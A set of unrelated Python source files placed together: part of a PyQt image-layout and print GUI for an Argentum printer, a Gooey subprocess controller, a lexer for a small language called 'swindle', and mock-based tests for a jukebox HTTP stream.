self.printLims.left if image.bottom < self.printLims.bottom: image.bottom = self.printLims.bottom if image.left + image.width > self.printLims.left + self.printLims.width: image.left = (self.printLims.left + self.printLims.width - image.width) if image.bottom + image.height > self.printLims.bottom + self.printLims.height: image.bottom = (self.printLims.bottom + self.printLims.height - image.height) if image.left < self.printLims.left: image.left = self.printLims.left image.width = self.printLims.width if image.bottom < self.printLims.bottom: image.bottom = self.printLims.bottom image.height = self.printLims.height def mouseMoveEvent(self, event): pressed = event.buttons() & QtCore.Qt.LeftButton p = self.screenToPrintArea(event.pos().x(), event.pos().y()) if p == None: if self.dragging == None and self.resizing == None: self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor)) return self.showTrashCanOpen = self.inTrashCan(self.dragging) px = p[0] py = p[1] #print("{}, {}".format(px, py)) if pressed and self.dragging != None: image = self.dragging image.left = px - self.dragStart[0] + self.dragImageStart[0] image.bottom = py - self.dragStart[1] + self.dragImageStart[1] image.screenRect = None self.layoutChanged = True self.update() elif pressed and self.resizing != None: image = self.resizing (leftEdge, rightEdge, topEdge, bottomEdge) = self.resizeEdges (startLeft, startBottom, startWidth, startHeight) = self.resizeImageStart dx = px - self.resizeStart[0] dy = py - self.resizeStart[1] if leftEdge: if dx + startLeft < startLeft + startWidth: image.left = dx + startLeft image.width = startWidth + startLeft - image.left elif rightEdge: if dx + startWidth > 0: image.width = dx + startWidth if topEdge: if dy + startHeight > 0: image.height = dy + startHeight elif bottomEdge: if dy + startBottom < startBottom + startHeight: image.bottom = dy + startBottom image.height = startHeight + startBottom - image.bottom image.lastResized = time.time() image.screenRect = None self.layoutChanged = True self.update() elif self.dragging == None and self.resizing == None: hit = False for image in reversed(self.images): if image == self.printHeadImage and not self.showingPrintHead: continue if not image.visible: continue leftEdge = False rightEdge = False topEdge = False bottomEdge = False n = 1.1 if pressed else 1.0 if (py >= image.bottom - n and py < image.bottom + image.height + n): if px >= image.left - n and px <= image.left: leftEdge = True if (px < image.left + image.width + n and px >= image.left + image.width): rightEdge = True if (px >= image.left - n and px < image.left + image.width + n): if py >= image.bottom - n and py <= image.bottom: bottomEdge = True if (py < image.bottom + image.height + n and py >= image.bottom + image.height): topEdge = True anyEdge = True if leftEdge and bottomEdge: self.setCursor(QtGui.QCursor(QtCore.Qt.SizeBDiagCursor)) elif rightEdge and topEdge: self.setCursor(QtGui.QCursor(QtCore.Qt.SizeBDiagCursor)) elif leftEdge and topEdge: self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor)) elif rightEdge and bottomEdge: self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor)) elif leftEdge or rightEdge: self.setCursor(QtGui.QCursor(QtCore.Qt.SizeHorCursor)) elif topEdge or bottomEdge: self.setCursor(QtGui.QCursor(QtCore.Qt.SizeVerCursor)) else: anyEdge = False if image == self.printHeadImage or image.filename.endswith(".hex"): anyEdge = False if anyEdge: hit = True if pressed: self.resizing = image self.resizeImageStart = (image.left, image.bottom, image.width, image.height) self.resizeStart = (px, py) self.resizeEdges = (leftEdge, rightEdge, topEdge, bottomEdge) break if px >= image.left and px < image.left + image.width: if py >= image.bottom and py < image.bottom + image.height: hit = True if pressed: self.dragging = image self.dragImageStart = (image.left, image.bottom) self.dragStart = (px, py) self.setCursor(QtGui.QCursor(QtCore.Qt.ClosedHandCursor)) else: self.setCursor(QtGui.QCursor(QtCore.Qt.OpenHandCursor)) break if not hit: self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor)) def dragEnterEvent(self, e): self.argentum.raise_() self.argentum.activateWindow() e.accept() def dropEvent(self, e): if e.mimeData().hasUrls(): url = str(e.mimeData().urls()[0].path()) pi = self.addDroppedFile(url, e.pos()) if pi: self.selection = pi def addDroppedFile(self, path, pos=None): if path[0] == '/' and path[2] == ':': # Windows path = path[1:] if path[-7:] == ".layout": self.openLayout(path) return None pi = self.addImageFile(path) if pi == None: return None if pos: p = self.screenToPrintArea(pos.x(), pos.y()) else: p = (self.printLims.left + self.printLims.width / 2, self.printLims.bottom + self.printLims.height / 2) if p != None: pi.left = p[0] - pi.width / 2 pi.bottom = p[1] - pi.height / 2 self.ensureImageInPrintLims(pi) return pi def copy(self): if self.selection == None: print("nothing to copy") return clipboard = QtGui.QApplication.clipboard() clipboard.setPixmap(self.selection.pixmap) def cut(self): if self.selection == None: print("nothing to cut") return self.copy() self.images.remove(self.selection) self.layoutChanged = True self.update() def delete(self): if self.selection == None: print("nothing to delete") return self.images.remove(self.selection) self.layoutChanged = True self.update() def paste(self): clipboard = QtGui.QApplication.clipboard() if clipboard.mimeData().hasUrls(): url = str(clipboard.mimeData().urls()[0].path()) pi = self.addDroppedFile(url) if pi != None: self.selection = pi return if clipboard.mimeData().hasImage(): image = clipboard.mimeData().imageData().toPyObject() fname = tempfile.mktemp() + ".png" print("using temp file " + fname) image.save(fname); pi = self.addDroppedFile(fname) if pi != None: self.selection = pi return def crop(self): if self.selection == None: print("nothing to crop") return image = self.selection.pixmap.toImage() progress = QtGui.QProgressDialog(self) progress.setWindowTitle("Cropping...") progress.show() total = image.height() * 2 + image.width() * 2 sofar = 0 nTop = 0 for j in range(0, image.height()): rowIsEmpty = True for i in range(0, image.width()): blue = QtGui.qBlue(image.pixel(i, j)) if blue <= 200: rowIsEmpty = False break if rowIsEmpty: nTop = nTop + 1 else: break progress.setValue((sofar+j+1) * 100.0 / total) QtGui.QApplication.processEvents() sofar = image.height() nWidth = image.width() for i in range(0, image.width()): colIsEmpty = True for j in range(0, image.height()): blue = QtGui.qBlue(image.pixel(image.width() - i - 1, j)) if blue <= 200: colIsEmpty = False break if colIsEmpty: nWidth = nWidth - 1 else: break progress.setValue((sofar+i+1) * 100.0 / total) QtGui.QApplication.processEvents() sofar += image.width() nLeft = 0 for i in range(0, image.width()): colIsEmpty = True for j in range(0, image.height()): blue = QtGui.qBlue(image.pixel(i, j)) if blue <= 200: colIsEmpty = False break if colIsEmpty: nLeft = nLeft + 1 else: break progress.setValue((sofar+i+1) * 100.0 / total) QtGui.QApplication.processEvents() sofar += image.width() nHeight = image.height() for j in range(0, image.height()): rowIsEmpty = True for i in range(0, image.width()): blue = QtGui.qBlue(image.pixel(i, image.height() - j - 1)) if blue <= 200: rowIsEmpty = False break if rowIsEmpty: nHeight = nHeight - 1 else: break progress.setValue((sofar+j+1) * 100.0 / total) QtGui.QApplication.processEvents() progress.setValue(99.0) QtGui.QApplication.processEvents() nBottom = image.height() - nHeight image = image.copy(nLeft, nTop, nWidth - nLeft, nHeight - nTop) fname = tempfile.mktemp() + ".png" print("using temp file " + fname) image.save(fname); progress.setValue(100.0) QtGui.QApplication.processEvents() self.images.remove(self.selection) newImage = self.addImageFile(fname) newImage.left = self.selection.left + nLeft / imageScale[0] newImage.bottom = self.selection.bottom + nBottom / imageScale[1] newImage.screenRect = None self.layoutChanged = True self.update() def erode(self): if self.selection == None: print("nothing to erode") return progress = QtGui.QProgressDialog(self) progress.setWindowTitle("Eroding...") progress.show() image = self.selection.pixmap.toImage() newImage = image.copy() for j in range(image.height()): for i in range(image.width()): newImage.setPixel(i, j, 0xffffff) for j in range(image.height()): for i in range(image.width()): if i == 0 or j == 0: continue if i+1 == image.width() or j+1 == image.height(): continue if QtGui.qBlue(image.pixel(i , j )) > 200: continue if QtGui.qBlue(image.pixel(i-1, j-1)) > 200: continue if QtGui.qBlue(image.pixel(i-1, j )) > 200: continue if QtGui.qBlue(image.pixel(i-1, j+1)) > 200: continue if QtGui.qBlue(image.pixel(i+1, j-1)) > 200: continue if QtGui.qBlue(image.pixel(i+1, j )) > 200: continue if QtGui.qBlue(image.pixel(i+1, j+1)) > 200: continue if QtGui.qBlue(image.pixel(i , j-1)) > 200: continue if QtGui.qBlue(image.pixel(i , j+1)) > 200: continue newImage.setPixel(i, j, 0) progress.setValue((j+1) * 100.0 / image.height()) QtGui.QApplication.processEvents() self.selection.pixmap = QtGui.QPixmap.fromImage(newImage) self.update() def dilate(self): if self.selection == None: print("nothing to dilate") return image = self.selection.pixmap.toImage() newImage = image.copy() progress = QtGui.QProgressDialog(self) progress.setWindowTitle("Dilating...") progress.show() for j in range(image.height()): for i in range(image.width()): if QtGui.qBlue(image.pixel(i, j)) <= 200: continue if i == 0: pass elif i == image.width()-1: pass elif j == 0: pass elif j == image.height()-1: pass else: if QtGui.qBlue(image.pixel(i-1, j-1)) <= 200: newImage.setPixel(i, j, 0) continue if QtGui.qBlue(image.pixel(i-1, j )) <= 200: newImage.setPixel(i, j, 0) continue if QtGui.qBlue(image.pixel(i-1, j+1)) <= 200: newImage.setPixel(i, j, 0) continue if QtGui.qBlue(image.pixel(i+1, j-1)) <= 200: newImage.setPixel(i, j, 0) continue if QtGui.qBlue(image.pixel(i+1, j )) <= 200: newImage.setPixel(i, j, 0) continue if QtGui.qBlue(image.pixel(i+1, j+1)) <= 200: newImage.setPixel(i, j, 0) continue if QtGui.qBlue(image.pixel(i , j-1)) <= 200: newImage.setPixel(i, j, 0) continue if QtGui.qBlue(image.pixel(i , j+1)) <= 200: newImage.setPixel(i, j, 0) continue progress.setValue((j+1) * 100.0 / image.height()) QtGui.QApplication.processEvents() self.selection.pixmap = QtGui.QPixmap.fromImage(newImage) self.update() def invert(self): if self.selection == None: print("nothing to invert") return image = self.selection.pixmap.toImage() newImage = image.copy() progress = QtGui.QProgressDialog(self) progress.setWindowTitle("Inverting...") progress.show() for j in range(image.height()): for i in range(image.width()): if QtGui.qBlue(image.pixel(i, j)) <= 200: newImage.setPixel(i, j, 0xffffff) else: newImage.setPixel(i, j, 0) progress.setValue((j+1) * 100.0 / image.height()) QtGui.QApplication.processEvents() self.selection.pixmap = QtGui.QPixmap.fromImage(newImage) self.update() def alignLefts(self): if self.selection == None: print("nothing to align.") return if self.selection2 == None: print("select two images to align.") return self.selection2.left = self.selection.left self.selection2.screenRect = self.printAreaToScreen(self.selection2) self.ensureImageInPrintLims(self.selection2) self.update() def alignRights(self): if self.selection == None: print("nothing to align.") return if self.selection2 == None: print("select two images to align.") return self.selection2.left = self.selection.left + self.selection.width - self.selection2.width self.selection2.screenRect = self.printAreaToScreen(self.selection2) self.ensureImageInPrintLims(self.selection2) self.update() def alignTops(self): if self.selection == None: print("nothing to align.") return if self.selection2 == None: print("select two images to align.") return self.selection2.bottom = self.selection.bottom + self.selection.height - self.selection2.height self.selection2.screenRect = self.printAreaToScreen(self.selection2) self.ensureImageInPrintLims(self.selection2) self.update() def alignBottoms(self): if self.selection == None: print("nothing to align.") return if self.selection2 == None: print("select two images to align.") return self.selection2.bottom = self.selection.bottom self.selection2.screenRect = self.printAreaToScreen(self.selection2) self.ensureImageInPrintLims(self.selection2) self.update() def openLayout(self, filename=None): if self.closeLayout() == False: return if filename == None: filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Select a layout', self.argentum.filesDir, "Layouts (*.layout)")) if filename == None: return file = open(filename, "r") lines = file.read().split('\n') file.close() layoutPath = os.path.dirname(filename) bImageSection = False image = None for line in lines: if len(line) == 0: continue if line[0] == '#': continue if line[0] == '[': bImageSection = False if line == '[image]': bImageSection = True continue if line.find('=') == -1: # What is this? continue key = line[0:line.find('=')] value = line[line.find('=')+1:] if bImageSection: if key == "filename": if image: self.ensureImageInPrintLims(image) filename = value if not os.path.isabs(filename): filename = os.path.join(layoutPath, filename) image = self.addImageFile(filename) if image: if key == "left": image.left = float(value) if key == "bottom": image.bottom = float(value) if key == "width": image.width = float(value) if key == "height": image.height = float(value) if key == "lastResized": image.lastResized = float(value) if image: self.ensureImageInPrintLims(image) self.layout = filename self.update() def saveLayout(self, filename=None): if self.layout == None: if filename == None: filename = str(QtGui.QFileDialog.getSaveFileName(self, 'Save layout as', self.argentum.filesDir, "Layouts (*.layout)")) if filename == None: return if filename.find('.layout') != len(filename)-7: filename = filename + '.layout' else: filename = self.layout # TODO we really need to create an archive of the control file # and all the images used # # XXX Saves full pathnames. :( file = open(filename, "w") layoutPath = os.path.dirname(filename) for image in self.images: if image == self.printHeadImage: continue file.write('[image]\n') path = os.path.relpath(image.filename, layoutPath) if path.find('..') != -1: path = image.filename file.write('filename={}\n'.format(path)) file.write('left={}\n'.format(image.left)) file.write('bottom={}\n'.format(image.bottom)) file.write('width={}\n'.format(image.width)) file.write('height={}\n'.format(image.height)) if image.lastResized: file.write('lastResized={}\n'.format(image.lastResized)) file.write('\n') file.close() self.layout = filename self.layoutChanged = False self.update() return True def closeLayout(self): if len(self.images) == 1: self.layout = None self.layoutChanged = False self.update() return True if self.layoutChanged: answer = QtGui.QMessageBox.question(self, "Unsaved Changes", "Would you like to save the current layout?", (QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard | QtGui.QMessageBox.Cancel)) if answer == QtGui.QMessageBox.Save: if not self.saveLayout(): return False elif answer == QtGui.QMessageBox.Cancel: return False self.images = [self.printHeadImage] self.layout = None self.layoutChanged = False self.update() return True def checkImageChanges(self): if self.printThread != None: return changed = [] for image in self.images: if image == self.printHeadImage: continue modified = os.path.getmtime(image.filename) if modified > image.lastLoaded and modified > self.lastCheckForChanges: changed.append(image) self.lastCheckForChanges = time.time() if len(changed) == 0: return mb = QtGui.QMessageBox(QtGui.QMessageBox.Question, "Outside Changes", "One or more image files have been changed by an outside editor. Would you like to reload these images?\n\nWARNING: any modification you have made to the changed image(s) will be lost.", (QtGui.QMessageBox.Yes | QtGui.QMessageBox.No), self) mb.setDetailedText("Changed files:\n{}".format('\n'.join(image.filename for image in changed))) answer = mb.exec_() if answer == QtGui.QMessageBox.No: return for image in changed: image.pixmap = self.pixmapFromFilename(image.filename) self.update() def showImageListTriggered(self): if self.argentum.showImageListAction.isChecked(): self.imageList.update() self.imageList.show() else: self.imageList.hide() # A kind of annoying Rect # Note: (0,0) is the bottom left corner of the printer # All measurements are in millimeters class PrintRect: def __init__(self, left, bottom, width, height): self.left = float(left) self.bottom = float(bottom) self.width = float(width) self.height = float(height) class PrintImage(PrintRect): def __init__(self, pixmap, filename): self.pixmap = pixmap self.filename = filename self.left = 0.0 self.bottom = 0.0 self.width = pixmap.width() / imageScale[0] self.height = pixmap.height() / imageScale[1] self.lastLoaded = time.time() self.lastResized = None self.screenRect = None self.visible = True filename = os.path.basename(filename) if filename.find('.') != -1: filename = filename[:filename.find('.')] self.hexFilename = filename + ".hex" def pixmapRect(self): return QtCore.QRectF(self.pixmap.rect()) class PrintCanceledException(Exception): pass class PrintOptionsDialog(QtGui.QDialog): def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.setWindowTitle("Print Options") mainLayout = QtGui.QVBoxLayout() self.printView = parent self.argentum = parent.argentum layout = QtGui.QHBoxLayout() layout.addWidget(QtGui.QLabel("Print each image")) self.passes = QtGui.QSpinBox(self) self.passes.setMinimum(1) layout.addWidget(self.passes) layout.addWidget(QtGui.QLabel("times")) mainLayout.addLayout(layout) self.useRollers = QtGui.QCheckBox("Dry the print after each pass") self.useRollers.setChecked(self.argentum.getOption("use_rollers", False)) mainLayout.addWidget(self.useRollers) self.alsoPause = QtGui.QCheckBox("Pause after each pass") self.alsoPause.setChecked(self.argentum.getOption("also_pause", True)) mainLayout.addWidget(self.alsoPause) layout = QtGui.QHBoxLayout() cancelButton = QtGui.QPushButton("Cancel") cancelButton.clicked.connect(self.reject) layout.addWidget(cancelButton) printButton = QtGui.QPushButton("Print") printButton.clicked.connect(self.accept) layout.addWidget(printButton) mainLayout.addLayout(layout) printButton.setDefault(True) self.setLayout(mainLayout) def getPasses(self): return self.passes.value() def getUseRollers(self): return self.useRollers.isChecked() def getAlsoPause(self): return self.alsoPause.isChecked() class PrintProgressDialog(QtGui.QDialog): def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.printView = parent mainLayout = QtGui.QVBoxLayout() self.label = QtGui.QLabel("") self.label.setAlignment(QtCore.Qt.AlignHCenter) mainLayout.addWidget(self.label) self.progressBar = QtGui.QProgressBar(self) self.progressBar.setOrientation(QtCore.Qt.Horizontal) mainLayout.addWidget(self.progressBar) layout = QtGui.QHBoxLayout() self.pauseButton = QtGui.QPushButton("Pause") self.pauseButton.clicked.connect(self.pause) layout.addWidget(self.pauseButton) self.cancelButton = QtGui.QPushButton("Cancel") self.cancelButton.clicked.connect(self.cancel) layout.addWidget(self.cancelButton) mainLayout.addLayout(layout) self.cancelButton.setDefault(True) self.setLayout(mainLayout) self.paused = False self.canceled = False def wasCanceled(self): return self.canceled def setLabelText(self, text): if text.startswith("Pass "): self.setWindowTitle("Printing ({})".format(text[:text.find(':')])) self.label.setText(text) def setValue(self, value): self.progressBar.setValue(value) if value == 100: self.hide() def cancel(self): self.canceled = True def pause(self): if self.paused: self.paused = False self.pauseButton.setText("Pause") else: self.paused = True self.pauseButton.setText("Resume") def closeEvent(self, e): self.cancel() class RateYourPrintDialog(QtGui.QDialog): def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.setWindowTitle("Rate Your Print") mainLayout = QtGui.QVBoxLayout() self.argentum = parent.argentum info = QtGui.QLabel("How was your print?") mainLayout.addWidget(info) mainLayout.addWidget(QtGui.QLabel(" ")) layout = QtGui.QHBoxLayout() for n in range(1, 6): label = QtGui.QLabel(str(n)) if n == 1: label.setAlignment(QtCore.Qt.AlignLeft) if n == 2: label.setAlignment(QtCore.Qt.AlignLeft) layout.addSpacing(45) if n == 3: label.setAlignment(QtCore.Qt.AlignHCenter) if n == 4: label.setAlignment(QtCore.Qt.AlignRight) if n == 5: layout.addSpacing(45) label.setAlignment(QtCore.Qt.AlignRight) layout.addWidget(label) mainLayout.addLayout(layout) self.slider = QtGui.QSlider(QtCore.Qt.Horizontal, self) self.slider.setRange(1, 5) self.slider.setValue(3) self.slider.setTickInterval(1) self.slider.setTickPosition(self.slider.TicksAbove) mainLayout.addWidget(self.slider) mainLayout.addWidget(QtGui.QLabel(" ")) info = QtGui.QLabel("Your feedback is important. Please let us know how we can make your print better.") mainLayout.addWidget(info) self.comments = QtGui.QTextEdit(self) mainLayout.addWidget(self.comments) layout = QtGui.QHBoxLayout() info = QtGui.QLabel("Your printer number:") layout.addWidget(info) self.printerNum = QtGui.QLineEdit(self) if self.argentum.getPrinterNumber(): self.printerNum.setText(self.argentum.getPrinterNumber()) layout.addWidget(self.printerNum) self.printerNum.setToolTip("Look on the back of your printer.") mainLayout.addLayout(layout) self.wantContact = QtGui.QCheckBox("Contact me about this print") self.wantContact.stateChanged.connect(self.contactMe) mainLayout.addWidget(self.wantContact) self.emailLayout = None self.email = None layout = QtGui.QHBoxLayout() cancelButton = QtGui.QPushButton("Cancel") cancelButton.clicked.connect(self.reject) layout.addWidget(cancelButton) self.sendButton = QtGui.QPushButton("Send Report") self.sendButton.clicked.connect(self.sendReport) layout.addWidget(self.sendButton) mainLayout.addLayout(layout) self.sendButton.setDefault(True) self.setLayout(mainLayout) def contactMe(self, state): mainLayout = self.layout() if state == QtCore.Qt.Unchecked: if self.emailLayout: mainLayout.removeItem(self.emailLayout) self.yourEmailInfo.deleteLater() self.email.deleteLater() self.emailLayout.deleteLater() self.yourEmailInfo = None self.email = None self.emailLayout = None else: self.emailLayout = QtGui.QHBoxLayout() self.yourEmailInfo = QtGui.QLabel("Your email:") self.emailLayout.addWidget(self.yourEmailInfo) self.email = QtGui.QLineEdit(self) if self.argentum.getEmail(): self.email.setText(self.argentum.getEmail()) self.emailLayout.addWidget(self.email) mainLayout.insertLayout(mainLayout.count() - 1, self.emailLayout) self.update() def sendLoop(self): firmware = "" if self.argentum.printer != None: firmware = self.argentum.printer.version data = {"rate": self.rate, "comments": self.commentText, "installnum": self.argentum.getInstallNumber(), "printernum": self.printerNumText, "email": self.emailText, "ts_processing_images": self.argentum.getTimeSpentProcessingImages(), "ts_sending_files": self.argentum.getTimeSpentSendingFiles(), "ts_printing": self.argentum.getTimeSpentPrinting(), "version": BASEVERSION, "firmware": firmware } r = requests.post("https://connect.cartesianco.com/feedback/print.php", data=data, verify=CA_CERTS) print(r.text) def sendReport(self): self.sendButton.setText("Sending...") self.printerNumText = str(self.printerNum.text()) self.emailText = "" if self.email: self.emailText = str(self.email.text()) if self.printerNumText != "": self.argentum.setPrinterNumber(self.printerNumText) if self.emailText != "" and self.emailText != self.argentum.getEmail(): self.argentum.setEmail(self.emailText) self.rate = self.slider.sliderPosition() self.commentText = str(self.comments.toPlainText()) updateThread = threading.Thread(target=self.sendLoop) updateThread.start() self.accept() class ImageList(QtGui.QDialog): def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.parent = parent self.setWindowTitle("Image List") mainLayout = QtGui.QVBoxLayout() self.imageList = QtGui.QListWidget(self) self.imageList.setSelectionMode(QtGui.QAbstractItemView.NoSelection) self.imageList.itemClicked.connect(self.itemClicked) self.imageList.itemEntered.connect(self.itemEntered) mainLayout.addWidget(self.imageList) self.setLayout(mainLayout) self.visibleIcon = QtGui.QIcon("visible.png") self.notVisibleIcon = QtGui.QIcon("notvisible.png") def update(self): self.imageList.clear() for image in self.parent.images: if image == self.parent.printHeadImage: continue item = QtGui.QListWidgetItem(self.visibleIcon, os.path.basename(image.filename)) item.setData(QtCore.Qt.UserRole, image) self.imageList.addItem(item) QtGui.QDialog.update(self) def itemClicked(self, item): if item.icon().serialNumber() == self.visibleIcon.serialNumber(): item.setIcon(self.notVisibleIcon) item.data(QtCore.Qt.UserRole).toPyObject().visible = False else: item.setIcon(self.visibleIcon) item.data(QtCore.Qt.UserRole).toPyObject().visible = True self.parent.update() def itemEntered(self, item): if self.imageList.currentItem() and self.imageList.currentItem() != item: curImage = self.imageList.currentItem().data(QtCore.Qt.UserRole).toPyObject() enterImage = item.data(QtCore.Qt.UserRole).toPyObject() curImageIdx = self.parent.images.index(curImage) enterImageIdx = self.parent.images.index(enterImage) if enterImageIdx == curImageIdx + 1: images = self.parent.images[:curImageIdx] images.append(enterImage) images.append(curImage) if enterImageIdx + 1 != len(self.parent.images): images.extend(self.parent.images[enterImageIdx+1:]) self.parent.images = images self.parent.update() self.update() elif enterImageIdx == curImageIdx - 1: images = self.parent.images[:enterImageIdx] images.append(curImage) images.append(enterImage) if curImageIdx + 1 != len(self.parent.images): images.extend(self.parent.images[curImageIdx+1:]) self.parent.images = images self.parent.update() self.update() def closeEvent(self, e): self.parent.argentum.showImageListAction.setChecked(False)
import os import re import subprocess from functools import partial from multiprocessing.dummy import Pool import sys from gooey.gui.pubsub import pub from gooey.gui.util.casting import safe_float from gooey.gui.util.functional import unit, bind from gooey.gui.util.taskkill import taskkill class ProcessController(object): def __init__(self, progress_regex, progress_expr): self._process = None self.progress_regex = progress_regex self.progress_expr = progress_expr def was_success(self): self._process.communicate() return self._process.returncode == 0 def poll(self): if not self._process: raise Exception('Not started!') self._process.poll() def stop(self): if self.running(): taskkill(self._process.pid) def running(self): return self._process and self.poll() is None def run(self, command): env = os.environ.copy() env["GOOEY"] = "1" self._process = subprocess.Popen( command.encode(sys.getfilesystemencoding()), bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, env=env) Pool(1).apply_async(self._forward_stdout, (self._process,)) def _forward_stdout(self, process): ''' Reads the stdout of `process` and forwards lines and progress to any interested subscribers ''' while True: line = process.stdout.readline() if not line: break pub.send_message('console_update', msg=line) pub.send_message('progress_update', progress=self._extract_progress(line)) pub.send_message('execution_complete') def _extract_progress(self, text): ''' Finds progress information in the text using the user-supplied regex and calculation instructions ''' # monad-ish dispatch to avoid the if/else soup find = partial(re.search, string=text.strip()) regex = unit(self.progress_regex) match = bind(regex, find) result = bind(match, self._calculate_progress) return result def _calculate_progress(self, match): ''' Calculates the final progress value found by the regex ''' if not self.progress_expr: return safe_float(match.group(1)) else: return self._eval_progress(match) def _eval_progress(self, match): ''' Runs the user-supplied progress calculation rule ''' _locals = {k: safe_float(v) for k, v in match.groupdict().items()} if "x" not in _locals: _locals["x"] = [safe_float(x) for x in match.groups()] try: return int(eval(self.progress_expr, {}, _locals)) except: return None
# lexer.py # # author: Christopher S. Corley from swindle.lexeme import Lexeme from swindle.types import (Types, get_type, PUNCTUATION) from io import TextIOWrapper class Lexer: def __init__(self, fileptr): # fileptr is generally a TextIOWrapper when reading from a file self.fileptr = fileptr self.done = False self.comment_mode = False self.need_terminator = False # To emulate pushing things back to the stream self.saved_char = None # character is a generator so we can have nice reading things # like next(self.character) self.character = self.char_generator() # line_no and col_no have special properties because we always want # line 0 to be line 1. @property def line_no(self): return self._line_no @line_no.setter def line_no(self, val): self._line_no = val + 1 @property def col_no(self): return self._col_no @col_no.setter def col_no(self, val): self._col_no = val + 1 def make_error(self, msg): if type(self.fileptr) is TextIOWrapper: exception_str = str(self.fileptr.name) + "\n" else: exception_str = str(type(self.fileptr)) + "\n\t" exception_str += str(self.fileptr) + "\n" exception_str += "Error on line " + str(self.line_no) exception_str += ", character " + str(self.col_no) exception_str += ": \n\t" + str(msg) raise Exception(exception_str) # a convenient way to count line numbers and read things character # by character. def char_generator(self): for self.line_no, line in enumerate(self.fileptr): for self.col_no, char in enumerate(line): self.saved_char = None yield char # returning None will represent an EOF marker, but also make looping # easy since loops stop on None or False def get_next_char(self): if self.saved_char: c = self.saved_char self.saved_char = None else: try: c = next(self.character) except StopIteration: self.done = True return None return c def skip_whitespace(self): # skip_whitespace will do just that, but in swindle we need the # extra property of tokenizing the whitespace at the beginning # of a line as well. So, this will either return a whitespace # Lexeme or None. c = self.get_next_char() while c: if self.comment_mode: if c == '\n': self.comment_mode = False if self.need_terminator: self.need_terminator = False return Lexeme(c, self.line_no, self.col_no) elif c == '#': self.comment_mode = True elif c == ' ': pass elif c == '\n': # begin tokenizing whitespace for indent self.comment_mode = False if self.need_terminator: self.need_terminator = False return Lexeme(c, self.line_no, self.col_no) else: self.saved_char = c return None c = self.get_next_char() return None # Will return None if there are no characters left. def lex(self): ws_token = self.skip_whitespace() if ws_token: return ws_token c = self.get_next_char() if c: if ( c == '(' or c == ')' or c == ':' or c == '`' or c == '.' or c == '[' or c == ']'): self.need_terminator = True return Lexeme(c, self.line_no, self.col_no) elif c.isdigit(): self.saved_char = c self.need_terminator = True return self.lex_number() elif c.isalpha(): self.saved_char = c self.need_terminator = True return self.lex_id_or_keyword() elif c == '"': self.saved_char = c self.need_terminator = True return self.lex_string() else: raise Exception("Unknown token found") return Lexeme(c, self.line_no, self.col_no, unknown=True) return None def lex_number(self): cstr = self.get_next_char() c = self.get_next_char() while c.isdigit(): cstr += c c = self.get_next_char() if (c not in PUNCTUATION and c != ' ' and c != '\n'): self.make_error("Variable names must begin with a letter.") self.saved_char = c return Lexeme(cstr, self.line_no, self.col_no) def lex_id_or_keyword(self): # we already know the saved_char contains the first letter of # the id or keyword, so get it back off again. cstr = self.get_next_char() c = self.get_next_char() while c and (c.isalpha() or c.isdigit() or c == "_" # for the set! keyword or c == "!"): cstr += c c = self.get_next_char() if c and (c not in PUNCTUATION and c != ' ' and c != '\n'): self.make_error("Variable names cannot contain character " + c) self.saved_char = c return Lexeme(cstr, self.line_no, self.col_no) def lex_string(self): cstr = self.get_next_char() # if we want to collect beginning " # which we do, because we want to have an easy way for Lexeme # to detect the string literal c = self.get_next_char() while c: if c == '\\': # this will allow us to grab any escaped character cstr += c c = self.get_next_char() elif c == '"': cstr += c # if we want to collect ending " return Lexeme(cstr, self.line_no, self.col_no) cstr += c c = self.get_next_char()
import mock import twisted.web.server import jukebox.httpd def test_stream_get(): request = mock.Mock(name='request') source = mock.Mock(name='source', spec=jukebox.httpd.Source) Client = mock.Mock(name='Client') stream = jukebox.httpd.Stream(source, Client) result = stream.render_GET(request) assert twisted.web.server.NOT_DONE_YET == result Client.assert_called_with(request) source.add_client.assert_called_with(Client.return_value) def test_client_init(): request = mock.Mock(name='request') jukebox.httpd.Client(request) request.setHeader.assert_called_with('Content-Type', 'audio/mpeg') def test_client_send(): request = mock.Mock(name='request') client = jukebox.httpd.Client(request) client.send('foo') request.write.assert_called_with('foo') def test_source_init_start_song_callback(): playlist = mock.Mock(name='playlist', cur=None) encoder = mock.Mock(name='encoder') source = jukebox.httpd.Source(playlist, encoder) playlist.add_listener.assert_called_with(source.start_new_song) def test_add_client_send(): playlist = mock.Mock(name='playlist', cur=None) encoder = mock.Mock(name='encoder') source = jukebox.httpd.Source(playlist, encoder) client = mock.Mock(name='client') source.add_client(client) source.send('foo') client.send.assert_called_with('foo') def test_source_new_song(): playlist = mock.Mock(name='playlist') encoder = mock.Mock(name='encoder') source = jukebox.httpd.Source(playlist, encoder) source.start_new_song('NEW_CUR') encoder.assert_called_with( song=playlist.cur, data_callback=source.send, ) encoder.return_value.encode.assert_called() def test_source_not_new_song(): playlist = mock.Mock(name='playlist') encoder = mock.Mock(name='encoder') source = jukebox.httpd.Source(playlist, encoder) source.start_new_song('FOO') assert not encoder.called def test_source_new_song_empty_playlist(): playlist = mock.Mock(name='playlist', cur=None) encoder = mock.Mock(name='encoder') source = jukebox.httpd.Source(playlist, encoder) source.start_new_song('NEW_CUR') assert not encoder.called
